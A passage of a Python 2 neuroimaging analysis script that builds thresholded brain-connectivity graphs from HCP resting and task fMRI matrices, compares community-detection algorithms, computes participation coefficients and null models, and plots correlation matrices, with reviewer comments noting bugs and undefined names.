    Thresholds `matrix` at graph costs 0.05-0.15 (MST-enforced) and records
    Q (modularity) from InfoMap, Louvain (multilevel) and fast-greedy
    partitions at each cost.

    Returns [mean InfoMap Q, mean Louvain Q, mean fast-greedy Q].
    """
    infomap_q = []
    louvain_q = []
    greedy_q = []
    for cost in np.arange(5, 16) * 0.01:
        g = brain_graphs.matrix_to_igraph(matrix.copy(), cost, binary=False, check_tri=True, interpolation='midpoint', normalize=True, mst=True)
        # sanity check: achieved density must track the requested cost
        assert np.diff([cost, g.density()])[0] < .01
        infomap_q.append(g.community_infomap(edge_weights='weight').modularity)
        louvain_q.append(g.community_multilevel(weights='weight').modularity)
        greedy_q.append(g.community_fastgreedy(weights='weight').as_clustering().modularity)
    return [np.nanmean(infomap_q), np.nanmean(louvain_q), np.nanmean(greedy_q)]
def alg_compare(subjects,homedir=homedir):
    """Compare community algorithms across subjects' mean REST matrices.

    For each subject, load every power-atlas REST matrix, Fisher-z transform
    (arctanh) and average them, then run alg_compare_multi over all subjects
    in parallel. Results are saved to results/alg_compare.npy.

    subjects: iterable of subject ID strings.
    homedir: base directory containing dynamic_mod/ (module global default).
    """
    task = 'REST'
    atlas = 'power'
    project='hcp'
    matrices = []
    for subject in subjects:
        s_matrix = []
        files = glob.glob('%sdynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(homedir,atlas,subject,atlas,task))
        for f in files:
            f = np.load(f)
            np.fill_diagonal(f,0.0)
            f[np.isnan(f)] = 0.0
            f = np.arctanh(f) # Fisher z-transform of the correlations
            s_matrix.append(f.copy())
        if len(s_matrix) == 0:
            # no matrices on disk for this subject; skip it
            continue
        s_matrix = np.nanmean(s_matrix,axis=0)
        matrices.append(s_matrix.copy())
    pool = Pool(40)
    try:
        results = pool.map(alg_compare_multi,matrices)
    finally:
        # BUG FIX: the pool was never closed or joined, leaking 40 worker
        # processes per call.
        pool.close()
        pool.join()
    np.save('%sdynamic_mod/results/alg_compare.npy'%(homedir),results)
def alg_plot():
    """Plot the alg_compare results: one violin plot of Q by algorithm plus
    pairwise regression panels comparing the algorithms' Q values.

    Reads results/alg_compare.npy (written by alg_compare) and writes
    figures/alg_compare.pdf.
    """
    sns.set_style("white")
    sns.set_style("ticks")
    d = np.load('%sdynamic_mod/results/alg_compare.npy'%(homedir))
    df = pd.DataFrame(columns=['Q','Community Algorithm'])
    # one row per subject per algorithm (d columns: InfoMap, Louvain, FastGreedy)
    for i,s in enumerate(d):
        df = df.append({"Q":s[0],'Community Algorithm':'InfoMap','subject':i},ignore_index=True)
        df = df.append({"Q":s[1],'Community Algorithm':'Louvain','subject':i},ignore_index=True)
        df = df.append({"Q":s[2],'Community Algorithm':'Fast Greedy','subject':i},ignore_index=True)
    # top row: violins; bottom row: three pairwise scatter panels
    ax1 = plt.subplot2grid((3,3), (0,0), colspan=3)
    ax2 = plt.subplot2grid((3,3), (1, 0))
    ax3 = plt.subplot2grid((3,3), (1, 1))
    ax4 = plt.subplot2grid((3,3), (1, 2))
    sns.set_style("white")
    sns.set_style("ticks")
    sns.set(context="paper",font='Helvetica',font_scale=1.2)
    sns.violinplot(data=df,inner='quartile',y='Q',x='Community Algorithm',palette=sns.color_palette("cubehelix", 8)[-3:],ax=ax1)
    sns.plt.legend(bbox_to_anchor=[1,1.05],columnspacing=10)
    ax1.set_title('Q Values Across Different Algorithms')
    # NOTE(review): `axes` is unused -- the zip below uses [ax2,ax3,ax4].
    axes = [ax1,ax2,ax3]
    for x,ax in zip(combinations(np.unique(df['Community Algorithm']),2),[ax2,ax3,ax4]):
        print x[0],x[1]
        print pearsonr(df.Q[df['Community Algorithm']==x[0]],df.Q[df['Community Algorithm']==x[1]])
        print scipy.stats.ttest_ind(df.Q[df['Community Algorithm']==x[0]],df.Q[df['Community Algorithm']==x[1]])
        sns.regplot(df.Q[df['Community Algorithm']==x[0]],df.Q[df['Community Algorithm']==x[1]],ax=ax,color=sns.dark_palette("muted purple", input="xkcd")[-1])
        ax.set_xlabel(x[0] + ' Q')
        ax.set_ylabel(x[1] + ' Q')
    # NOTE(review): savefig comes AFTER show(); with an interactive backend
    # the figure may already be cleared when saved -- confirm the ordering.
    sns.plt.show()
    plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/alg_compare.pdf',dpi=3600)
    plt.close()
def nan_pearsonr(x, y):
    """Pearson correlation of x and y, ignoring positions where either
    input is NaN. Returns (r, p) like scipy.stats.pearsonr."""
    x = np.array(x)
    y = np.array(y)
    # a position is valid only when the elementwise sum is not NaN
    valid = np.isnan(x + y) == False
    return pearsonr(x[valid], y[valid])
def remove_missing_subjects(subjects,task,atlas):
    """
    Return the subset of subjects with at least two matrix files on disk
    for this task/atlas combination. The input is not mutated.

    BUG FIX: the original removed items from the list while iterating over
    it, which skips the element that follows every removal, so some
    subjects with missing data survived the filter. (Its docstring also
    claimed the original array was edited in place; it never was -- the
    input was copied first.)
    """
    kept = []
    for subject in subjects:
        files = glob.glob('/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(atlas,subject,atlas,task))
        if len(files) >= 2:
            kept.append(subject)
    return kept
def check_motion(subjects):
    """For each NKI subject, print the correlation between framewise
    displacement and the temporal SD of component engagement.

    # assumes the engagement array reshapes to (900, 12) -- i.e. 900
    # timepoints by 12 components; TODO confirm against the writer of
    # the *_engagement.npy files.
    """
    for subject in subjects:
        e = np.load('/home/despoB/mb3152/dynamic_mod/component_activation/%s_12_False_engagement.npy' %(subject))
        m = np.loadtxt('/home/despoB/mb3152/data/nki_data/preprocessed/pipeline_comp_cor_and_standard/%s_session_1/frame_wise_displacement/_scan_RfMRI_mx_645_rest/FD.1D'%(subject))
        print pearsonr(m,np.std(e.reshape(900,12),axis=1))
def plot_corr_matrix(matrix,membership,colors,out_file=None,reorder=True,line=False,rectangle=False,draw_legend=False,colorbar=False):
    """
    matrix: square, whatever you like
    membership: the community (or whatever you like of each node in the matrix)
    colors: the colors of each node in the matrix (same order as membership)
    out_file: save the file here, will supress plotting, do None if you want to plot it.
    reorder: group rows/columns so nodes in the same community are contiguous
    line: draw those little lines to divide up communities
    rectangle: draw colored rectangles around each community
    draw legend: draw legend...
    colorbar: colorbar...
    Returns the seaborn clustermap object.
    """
    if reorder == True:
        # Build an old-index -> new-index map grouping nodes by community,
        # then permute both matrix axes with it.
        swap_dict = {}
        index = 0
        corr_mat = np.zeros((matrix.shape))
        names = []
        x_ticks = []
        y_ticks = []
        reordered_colors = []
        for i in np.unique(membership):
            for node in np.where(membership==i)[0]:
                swap_dict[node] = index
                index = index + 1
                names.append(membership[node])
                reordered_colors.append(colors[node])
        for i in range(len(swap_dict)):
            for j in range(len(swap_dict)):
                corr_mat[swap_dict[i],swap_dict[j]] = matrix[i,j]
                corr_mat[swap_dict[j],swap_dict[i]] = matrix[j,i]
        colors = reordered_colors
        membership = np.array(names)
    else:
        corr_mat = matrix
    sns.set(style='dark',context="paper",font='Helvetica',font_scale=1.2)
    # color limits clipped to mean +/- 2 SD of the plotted matrix
    std = np.nanstd(corr_mat)
    mean = np.nanmean(corr_mat)
    # clustering disabled on both axes: clustermap is used only for its
    # row/column color strips
    fig = sns.clustermap(corr_mat,yticklabels=[''],xticklabels=[''],cmap=sns.diverging_palette(260,10,sep=10, n=20,as_cmap=True),rasterized=True,col_colors=colors,row_colors=colors,row_cluster=False,col_cluster=False,**{'vmin':mean - (std*2),'vmax':mean + (std*2),'figsize':(15.567,15)})
    ax = fig.fig.axes[4]  # the heatmap axes within the clustermap figure
    # Use matplotlib directly to emphasize known networks
    if line == True or rectangle == True:
        if len(colors) != len(membership):
            colors = np.arange(len(membership))
        for i,network,color, in zip(np.arange(len(membership)),membership,colors):
            # draw at each community boundary (where the label changes)
            if network != membership[i - 1]:
                if len(colors) != len(membership):
                    color = 'white'
                if rectangle == True:
                    # NOTE(review): 264 is hard-coded here (power-atlas node
                    # count); other atlases will misplace these rectangles.
                    ax.add_patch(patches.Rectangle((i+len(membership[membership==network]),264-i),len(membership[membership==network]),len(membership[membership==network]),facecolor="none",edgecolor=color,linewidth="2",angle=180))
                if line == True:
                    ax.axhline(len(membership) - i, c=color,linewidth=.5,label=network)
                    ax.axhline(len(membership) - i, c='black',linewidth=.5)
                    ax.axvline(i, c='black',linewidth=.5)
    # outline the color strips, then shrink them toward the heatmap
    fig.ax_col_colors.add_patch(patches.Rectangle((0,0),264,1,facecolor="None",edgecolor='black',lw=2))
    fig.ax_row_colors.add_patch(patches.Rectangle((0,0),1,264,facecolor="None",edgecolor='black',lw=2))
    col = fig.ax_col_colors.get_position()
    fig.ax_col_colors.set_position([col.x0, col.y0, col.width*1, col.height*.35])
    col = fig.ax_row_colors.get_position()
    fig.ax_row_colors.set_position([col.x0+col.width*(1-.35), col.y0, col.width*.35, col.height*1])
    fig.ax_col_dendrogram.set_visible(False)
    fig.ax_row_dendrogram.set_visible(False)
    if draw_legend == True:
        leg = fig.ax_heatmap.legend(bbox_to_anchor=[.98,1.1],ncol=5)
        for legobj in leg.legendHandles:
            legobj.set_linewidth(2.5)
    if colorbar == False:
        fig.cax.set_visible(False)
    if out_file != None:
        plt.savefig(out_file,dpi=600)
        plt.close()
    if out_file == None:
        plt.show()
    return fig
def plot_corr_matrix2(matrix,membership,reorder=True):
    """
    Heatmap of `matrix` with black rectangles outlining each community in
    `membership`, optionally reordering nodes so communities are contiguous.

    matrix: square connectivity matrix
    membership: community label per node (same order as matrix rows)
    reorder: group rows/columns by community before plotting

    BUG FIX: the reordered matrix (corr_mat) was computed and then ignored --
    the un-reordered `matrix` was plotted, so the community rectangles (drawn
    from the reordered membership) did not line up with the data. Also,
    corr_mat was undefined when reorder=False. The (possibly reordered)
    corr_mat is now the matrix that is plotted.
    """
    if reorder == True:
        # old-index -> new-index map grouping nodes by community
        swap_dict = {}
        index = 0
        corr_mat = np.zeros((matrix.shape))
        names = []
        for i in np.unique(membership):
            for node in np.where(membership==i)[0]:
                swap_dict[node] = index
                index = index + 1
                names.append(membership[node])
        for i in range(len(swap_dict)):
            for j in range(len(swap_dict)):
                corr_mat[swap_dict[i],swap_dict[j]] = matrix[i,j]
                corr_mat[swap_dict[j],swap_dict[i]] = matrix[j,i]
        membership = np.array(names)
    else:
        corr_mat = matrix
    sns.set(style='dark',context="paper",font='Helvetica',font_scale=1.2)
    # color limits clipped to mean +/- 2 SD; diagonal zeroed for display
    std = np.nanstd(corr_mat)
    mean = np.nanmean(corr_mat)
    np.fill_diagonal(corr_mat,0.0)
    fig = sns.heatmap(corr_mat,yticklabels=[''],xticklabels=[''],cmap=sns.diverging_palette(260,10,sep=10, n=20,as_cmap=True),rasterized=True,**{'vmin':mean - (std*2),'vmax':mean + (std*2)})
    # Use matplotlib directly to emphasize known networks
    for i,network in zip(np.arange(len(membership)),membership):
        if network != membership[i - 1]:
            fig.figure.axes[0].add_patch(patches.Rectangle((i+len(membership[membership==network]),len(membership)-i),len(membership[membership==network]),len(membership[membership==network]),facecolor="none",edgecolor='black',linewidth="2",angle=180))
    sns.plt.show()
def make_static_matrix(subject,task,project,atlas,scrub=False):
    """Build one subject's static connectivity matrix from their time series
    and save it under dynamic_mod/<atlas>_matrices/.

    subject/task: substituted into the HCP subject-data glob pattern.
    project: unused here as written.
    atlas: parcellation template name (looked up under atlases/).
    scrub: when True, motion-scrub frames above 0.2mm displacement and save
        to the *_matrix_scrubbed_0.2.npy filename instead.

    # NOTE(review): when scrub=True, MP is None because the motion-file
    # loading below is commented out -- confirm load_subject_time_series
    # tolerates dis_file=None with scrub_mm set.
    """
    hcp_subject_dir = '/home/despoB/connectome-data/SUBJECT/*TASK*/*reg*'
    parcel_path = '/home/despoB/mb3152/dynamic_mod/atlases/%s_template.nii' %(atlas)
    MP = None
    # try:
    # 	MP = np.load('/home/despoB/mb3152/dynamic_mod/motion_files/%s_%s.npy' %(subject,task))
    # except:
    # 	run_fd(subject,task)
    # 	MP = np.load('/home/despoB/mb3152/dynamic_mod/motion_files/%s_%s.npy' %(subject,task))
    subject_path = hcp_subject_dir.replace('SUBJECT',subject).replace('TASK',task)
    if scrub == True:
        subject_time_series = brain_graphs.load_subject_time_series(subject_path,dis_file=MP,scrub_mm=0.2)
        brain_graphs.time_series_to_matrix(subject_time_series,parcel_path,voxel=False,fisher=False,out_file='/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_%s_matrix_scrubbed_0.2.npy' %(atlas,subject,atlas,task))
    if scrub == False:
        subject_time_series = brain_graphs.load_subject_time_series(subject_path,dis_file=None,scrub_mm=False)
        brain_graphs.time_series_to_matrix(subject_time_series,parcel_path,voxel=False,fisher=False,out_file='/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_%s_matrix.npy' %(atlas,subject,atlas,task))
    # parcel = nib.load(parcel_path).get_data().astype(int)
    # g = np.zeros((np.max(parcel),subject_time_series.shape[-1]))
    # for i in range(np.max(parcel)):
    # 	g[i,:] = np.nanmean(subject_time_series[parcel==i+1],axis = 0)
def proc_figure():
    """One-off figure script for subject 100307: example time series plot,
    a GML graph export for visualization, and an example matrix heatmap.

    NOTE(review): this looks like pasted exploratory code -- `atlas` is not
    defined in this scope (NameError on the parcel_path line), and `pc`,
    `wmd` and `mod` are appended to below without ever being initialized.
    It presumably only ran with those names bound in an interactive session.
    """
    hcp_subject_dir = '/home/despoB/connectome-data/SUBJECT/*TASK*/*reg*'
    # NOTE(review): `atlas` undefined here -- presumably 'power'; confirm.
    parcel_path = '/home/despoB/mb3152/dynamic_mod/atlases/%s_template.nii' %(atlas)
    dis_file = np.load('/home/despoB/mb3152/dynamic_mod/motion_files/100307_rfMRI_REST1_LR.npy')
    subject_path = hcp_subject_dir.replace('SUBJECT','100307').replace('TASK','REST1_LR')
    subject_time_series = brain_graphs.load_subject_time_series(subject_path,dis_file=None,scrub_mm=False)
    parcel = nib.load(parcel_path).get_data().astype(int)
    # g = np.zeros((np.max(parcel),subject_time_series.shape[-1]))
    # for i in range(np.max(parcel)):
    # 	g[i,:] = np.nanmean(subject_time_series[parcel==i+1],axis = 0)
    # np.save('100307_REST1LR_ts.npy',g)
    # g = np.corrcoef(g)
    # plot three example node time series, vertically offset for visibility
    ts = np.load('100307_REST1LR_ts.npy')
    sns.set_style("white")
    p = sns.color_palette("cubehelix", 8)
    sns.tsplot(ts[43]-125,color=p[5])
    sns.tsplot(ts[41],color=p[6])
    sns.tsplot(ts[215]+180,color=p[7])
    sns.plt.yticks([],[])
    sns.plt.xticks([],[])
    sns.despine()
    sns.plt.savefig('ts_example.pdf')
    plt.show()
    # mean Fisher-z REST matrix across this subject's runs
    m = []
    for f in glob.glob('%s/dynamic_mod/power_matrices/*100307*REST*'%(homedir)):
        if 'scrubbed' in f: continue
        f = np.load(f)
        np.fill_diagonal(f,0.0)
        f[np.isnan(f)] = 0.0
        f = np.arctanh(f)
        m.append(f.copy())
    m = np.nanmean(m,axis=0)
    membership,network_names,num_nodes,name_int_dict = network_labels('power')
    # m = np.load('/home/despoB/mb3152/diverse_club/graphs/REST.npy')
    m = np.triu(m,1) + np.triu(m,1).transpose()  # force exact symmetry
    graph = brain_graphs.matrix_to_igraph(m.copy(),0.05,binary=False,check_tri=True,interpolation='midpoint',normalize=False,mst=True)
    thresh_m = brain_graphs.threshold(m.copy(), .05, binary=False, check_tri=True, interpolation='midpoint', mst=True, test_matrix=True)
    graph = graph.community_infomap(edge_weights='weight')
    graph = brain_graphs.brain_graph(graph)
    graph = brain_graphs.matrix_to_igraph(m,0.05,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
    graph = graph.community_infomap(edge_weights='weight')
    graph = brain_graphs.brain_graph(graph)
    # NOTE(review): pc/wmd/mod are never initialized in this function --
    # these three appends raise NameError as written.
    pc.append(np.array(graph.pc))
    wmd.append(np.array(graph.wmd))
    mod.append(graph.community.modularity)
    # export node coordinates, community, PC and WCD to GML for external viz
    g = graph.community.graph
    g.vs['community'] = graph.community.membership
    p = pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)
    x,y,z = p[6],p[7],p[8]
    pc = graph.pc
    pc[np.isnan(pc)] = 0.0
    pc = pc * 1000
    pc = pc.astype(int)
    wcd= graph.wmd
    wcd[np.isnan(wcd)] = 0.0
    wcd = wcd * 1000
    wcd = wcd.astype(int)
    g.vs['latitude'] = np.array(y.values)
    g.vs['longitude'] = np.array(z.values)
    g.vs['pc'] = np.array(pc.astype('float16'))
    g.vs['wcd'] = np.array(wcd.astype('float16'))
    g.write_gml('100307_viz.gml')
    # reorder nodes into a canonical network order for the example heatmap
    network_order = ['Auditory','Sensory/somatomotor Hand','Sensory/somatomotor Mouth','Visual','Dorsal attention','Ventral attention',
    'Cingulo-opercular Task Control','Salience','Fronto-parietal Task Control','Default mode','Cerebellar','Subcortical','Memory retrieval?','Uncertain']
    colors = np.array(pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)[34].values)
    colors[colors=='Pale blue'] = '#ADD8E6'
    colors[colors=='Teal'] = '#008080'
    swap_indices = []
    for nn in network_order:
        original_idx = np.where(network_names == nn)
        for i in range(len(original_idx[0])):
            swap_indices.append(original_idx[0][i])
    membership = graph.community.membership
    swap_dict = {}
    index = 0
    corr_mat = np.zeros((m.shape))
    u = np.unique(membership)
    np.random.shuffle(u)
    for i in u:
        for node in np.where(membership==i)[0]:
            swap_dict[node] = index
            index = index + 1
    for i in range(len(swap_dict)):
        for j in range(len(swap_dict)):
            corr_mat[swap_dict[i],swap_dict[j]] = m[i,j]
            corr_mat[swap_dict[j],swap_dict[i]] = m[j,i]
    # NOTE(review): plt_m and corr_mat are computed but not plotted below.
    plt_m = np.tril(m) + np.triu(thresh_m)
    sns.heatmap(m[swap_indices,:][:,swap_indices],cmap="coolwarm",vmin=-1,vmax=1)
    plt.xticks([], [])
    plt.yticks([], [])
    plt.savefig('examplematrix.pdf')
    plt.show()
def null_graph_individual_graph_analyes(matrix):
    """Null model: detect communities on the real graph, then score that
    partition on an edge-shuffled version of the same matrix.

    Returns (Q, participation coefficients, within-module degree z-scores)
    of the real InfoMap partition applied to the shuffled graph.
    """
    cost = 0.05
    real_graph = brain_graphs.matrix_to_igraph(matrix.copy(),cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
    partition = real_graph.community_infomap(edge_weights='weight')
    # shuffle the lower triangle, zero the upper, then mirror to re-symmetrize
    shuffled = matrix.copy()
    lower = shuffled[np.tril_indices(264,-1)]
    np.random.shuffle(lower)
    shuffled[np.tril_indices(264,-1)] = lower
    shuffled[np.triu_indices(264)] = 0.0
    shuffled = np.nansum([shuffled,shuffled.transpose()],axis=0)
    null_graph = brain_graphs.matrix_to_igraph(shuffled,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
    scored = brain_graphs.brain_graph(VertexClustering(null_graph,partition.membership))
    return (scored.community.modularity,np.array(scored.pc),np.array(scored.wmd))
def null_community_individual_graph_analyes(matrix):
    """Null model: keep the real thresholded graph but randomly permute the
    InfoMap community labels before computing Q/PC/WMD.

    Returns (Q, participation coefficients, within-module degree z-scores).
    """
    cost = 0.05
    graph = brain_graphs.matrix_to_igraph(matrix.copy(),cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
    partition = graph.community_infomap(edge_weights='weight')
    labels = partition.membership
    np.random.shuffle(labels)
    null = brain_graphs.brain_graph(VertexClustering(partition.graph,labels))
    return (null.community.modularity,np.array(null.pc),np.array(null.wmd))
def null_all_individual_graph_analyes(matrix):
    """Null model: shuffle the matrix's edges AND re-detect communities on
    the shuffled graph (graph cost fixed at 0.01).

    Returns (Q, participation coefficients, within-module degree z-scores).
    """
    cost = 0.01
    # shuffle the lower triangle, zero the upper, then mirror to re-symmetrize
    shuffled = matrix.copy()
    lower = shuffled[np.tril_indices(264,-1)]
    np.random.shuffle(lower)
    shuffled[np.tril_indices(264,-1)] = lower
    shuffled[np.triu_indices(264)] = 0.0
    shuffled = np.nansum([shuffled,shuffled.transpose()],axis=0)
    graph = brain_graphs.matrix_to_igraph(shuffled,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
    partition = graph.community_infomap(edge_weights='weight')
    scored = brain_graphs.brain_graph(partition)
    return (scored.community.modularity,np.array(scored.pc),np.array(scored.wmd))
def individual_graph_analyes_wc(variables):
subject = variables[0]
print subject
atlas = variables[1]
task = variables[2]
s_matrix = variables[3]
pc = []
mod = []
wmd = []
memlen = []
for cost in np.array(range(5,16))*0.01:
temp_matrix = s_matrix.copy()
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True,mst=True)
assert np.diff([cost,graph.density()])[0] < .01
del temp_matrix
graph = graph.community_infomap(edge_weights='weight')
graph = brain_graphs.brain_graph(graph)
pc.append(np.array(graph.pc))
wmd.append(np.array(graph.wmd))
mod.append(graph.community.modularity)
memlen.append(len(graph.community.sizes()))
del graph
return (mod,np.nanmean(pc,axis=0),np.nanmean(wmd,axis=0),np.nanmean(memlen),subject)
def individual_graph_analyes(variables):
subject = variables[0]
print subject
atlas = variables[1]
task = variables[2]
s_matrix = variables[3]
pc = []
mod = []
wmd = []
for cost in np.array(range(5,16))*0.01:
temp_matrix = s_matrix.copy()
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
del temp_matrix
graph = graph.community_infomap(edge_weights='weight')
graph = brain_graphs.brain_graph(graph)
pc.append(np.array(graph.pc))
wmd.append(np.array(graph.wmd))
mod.append(graph.community.modularity)
del graph
return (mod,np.nanmean(pc,axis=0),np.nanmean(wmd,axis=0),subject)
def check_num_nodes(subjects,task,atlas='power'):
    """Check whether mean modularity correlates with the number of connected
    (degree > 0) nodes across subjects; prints the Pearson r.

    subjects: subject IDs with matrices on disk.
    task/atlas: select which matrix files to load.
    """
    mods = []
    num_nodes = []
    for subject in subjects:
        smods = []
        snum_nodes = []
        print subject
        s_matrix = []
        files = glob.glob('/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(atlas,subject,atlas,task))
        for f in files:
            f = np.load(f)
            np.fill_diagonal(f,0.0)
            f[np.isnan(f)] = 0.0
            f = np.arctanh(f)  # Fisher z-transform
            s_matrix.append(f.copy())
        if len(s_matrix) == 0:
            continue
        s_matrix = np.nanmean(s_matrix,axis=0)
        for cost in np.array(range(5,16))*0.01:
            temp_matrix = s_matrix.copy()
            graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
            del temp_matrix
            graph = graph.community_infomap(edge_weights='weight')
            smods.append(graph.modularity)
            # count nodes that kept at least one edge after thresholding
            snum_nodes.append(len(np.array(graph.graph.degree())[np.array(graph.graph.degree())>0.0]))
        mods.append(np.mean(smods))
        num_nodes.append(np.mean(snum_nodes))
    print pearsonr(mods,num_nodes)
def participation_coef(W, ci, degree='undirected'):
    '''
    Participation coefficient: diversity of a node's intermodular connections.

    Parameters
    ----------
    W : NxN np.ndarray
        binary/weighted directed/undirected connection matrix
    ci : Nx1 np.ndarray
        community affiliation vector
    degree : str
        'undirected' for undirected graphs, 'in' to use the in-degree,
        'out' to use the out-degree

    Returns
    -------
    P : Nx1 np.ndarray
        participation coefficient (0 for nodes with no (out) neighbors)
    '''
    if degree == 'in':
        W = W.T
    # relabel communities as consecutive integers starting at 1
    _, ci = np.unique(ci, return_inverse=True)
    ci += 1
    n_vertices = len(W)
    out_degree = np.sum(W, axis=1)
    # column j of neighbor_com holds ci[j] where an edge exists, else 0
    neighbor_com = np.dot((W != 0), np.diag(ci))
    within_sq = np.zeros((n_vertices,))
    for community in range(1, int(np.max(ci)) + 1):
        # add the squared strength of each node's ties into this community
        within_sq += np.square(np.sum(W * (neighbor_com == community), axis=1))
    P = np.ones((n_vertices,)) - within_sq / np.square(out_degree)
    # nodes with zero (out) degree get P = 0 rather than NaN
    P[np.where(np.logical_not(out_degree))] = 0
    return P
def check_sym():
    """Sanity checks across all tasks/subjects: each mean matrix must be
    symmetric, and brain_graphs' PC must match the reference
    participation_coef implementation above to within 1e-10.
    """
    known_membership,network_names,num_nodes,name_int_dict = network_labels('power')
    tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST']
    for task in tasks:
        print task
        subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_%s.npy' %('hcp',task,'power','fz'))
        for subject in subjects:
            print task,subject
            s_matrix = []
            files = glob.glob('/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%('power',subject,'power',task))
            for f in files:
                f = np.load(f)
                np.fill_diagonal(f,0.0)
                f[np.isnan(f)] = 0.0
                f = np.arctanh(f)  # Fisher z-transform
                s_matrix.append(f.copy())
            s_matrix = np.nanmean(s_matrix,axis=0)
            # symmetry: lower triangle must equal the transposed upper triangle
            assert (np.tril(s_matrix,-1) == np.triu(s_matrix,1).transpose()).all()
            graph = brain_graphs.matrix_to_igraph(s_matrix,0.15,binary=False,check_tri=False,interpolation='midpoint',normalize=True,mst=True)
            graph = brain_graphs.brain_graph(VertexClustering(graph,known_membership))
            graph.pc[np.isnan(graph.pc)] = 0.0
            assert np.max(graph.pc) < 1.0
            # PC from brain_graphs must agree with the reference implementation
            assert np.isclose(graph.pc,participation_coef(np.array(graph.matrix),np.array(graph.community.membership))).all() == True
            assert np.nansum(np.abs(graph.pc-participation_coef(np.array(graph.matrix),np.array(graph.community.membership)))) < 1e-10
def check_mst(subjects,task,atlas='power'):
    """Sanity check that MST-enforced graphs build at every cost 0.05-0.15
    for every subject (the density/connectivity asserts are commented out).

    NOTE(review): the `subjects` and `task` parameters are immediately
    shadowed by the loops below, and `tasks` is not defined in this
    function -- calling this raises NameError unless a global `tasks`
    happens to exist at call time. Presumably leftover from an
    interactive session; confirm before relying on it.
    """
    for task in tasks:
        subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_%s.npy' %('hcp',task,atlas,'fz'))
        for subject in subjects:
            print subject
            s_matrix = []
            files = glob.glob('/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(atlas,subject,atlas,task))
            for f in files:
                f = np.load(f)
                np.fill_diagonal(f,0.0)
                f[np.isnan(f)] = 0.0
                f = np.arctanh(f)  # Fisher z-transform
                s_matrix.append(f.copy())
            s_matrix = np.nanmean(s_matrix,axis=0)
            assert s_matrix.shape == (264,264)
            for cost in np.array(range(5,16))*0.01:
                temp_matrix = s_matrix.copy()
                graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=False,interpolation='midpoint',normalize=False,mst=True)
                # assert np.diff([cost,graph.density()])[0] < .005
                # assert graph.is_connected() == True
def check_scrubbed_normalize(subjects,task,atlas='power'):
    """Sanity check the motion-scrubbed matrices: rebuild each subject's
    mean scrubbed matrix (skipping scans where >75% of frames would be
    censored at FD > 0.2mm) and assert the thresholded graph density
    matches the requested cost.

    # `run_fd` is defined elsewhere in this file -- presumably returns the
    # per-frame framewise-displacement series for a scan; confirm.
    """
    for subject in subjects:
        print subject
        s_matrix = []
        files = glob.glob('/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_*%s*_matrix_scrubbed_0.2.npy'%(atlas,subject,atlas,task))
        for f in files:
            dis_file = run_fd(subject,'_'.join(f.split('/')[-1].split('_')[2:5]))
            # mark high-motion frames AND their immediate neighbors for removal
            remove_array = np.zeros(len(dis_file))
            for i,fdf in enumerate(dis_file):
                if fdf > .2:
                    remove_array[i] = 1
                    if i == 0:
                        remove_array[i+1] = 1
                        continue
                    if i == len(dis_file)-1:
                        remove_array[i-1] = 1
                        continue
                    remove_array[i-1] = 1
                    remove_array[i+1] = 1
            # skip scans where more than 75% of frames would be censored
            if len(remove_array[remove_array==1])/float(len(remove_array)) > .75:
                continue
            f = np.load(f)
            np.fill_diagonal(f,0.0)
            f[np.isnan(f)] = 0.0
            f = np.arctanh(f)  # Fisher z-transform
            s_matrix.append(f.copy())
        s_matrix = np.nanmean(s_matrix,axis=0)
        assert s_matrix.shape == (264,264)
        for cost in np.array(range(5,16))*0.01:
            temp_matrix = s_matrix.copy()
            graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
            assert np.diff([cost,graph.density()])[0] < .005
def graph_metrics(subjects,task,atlas,run_version,project='hcp',run=False,scrubbed=False,homedir=homedir):
"""
run graph metrics or load them
"""
if run == False:
# done_subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_%s.npy' %(project,task,atlas,run_version))
# assert (done_subjects == subjects).all() #make sure you are getting subjects / subjects order you wanted and ran last time.
subject_pcs = np.load('%sdynamic_mod/results/%s_%s_%s_pcs_%s.npy' %(homedir,project,task,atlas,run_version))
subject_wmds = np.load('%sdynamic_mod/results/%s_%s_%s_wmds_%s.npy' %(homedir,project,task,atlas,run_version))
subject_mods = np.load('%sdynamic_mod/results/%s_%s_%s_mods_%s.npy' %(homedir,project,task,atlas,run_version))
try:
subject_communities = np.load('%sdynamic_mod/results/%s_%s_%s_coms_%s.npy' %(homedir,project,task,atlas,run_version))
except:
subject_communities = np.load('%sdynamic_mod/results/%s_%s_%s_coms_fz_wc.npy' %(homedir,project,task,atlas))
matrices = np.load('%sdynamic_mod/results/%s_%s_%s_matrices_%s.npy' %(homedir,project,task,atlas,run_version))
thresh_matrices = np.load('%sdynamic_mod/results/%s_%s_%s_z_matrices_%s.npy' %(homedir,project,task,atlas,run_version))
finished_subjects = np.load('%sdynamic_mod/results/%s_%s_%s_subs_%s.npy' %(homedir,project,task,atlas,run_version))
elif run == True:
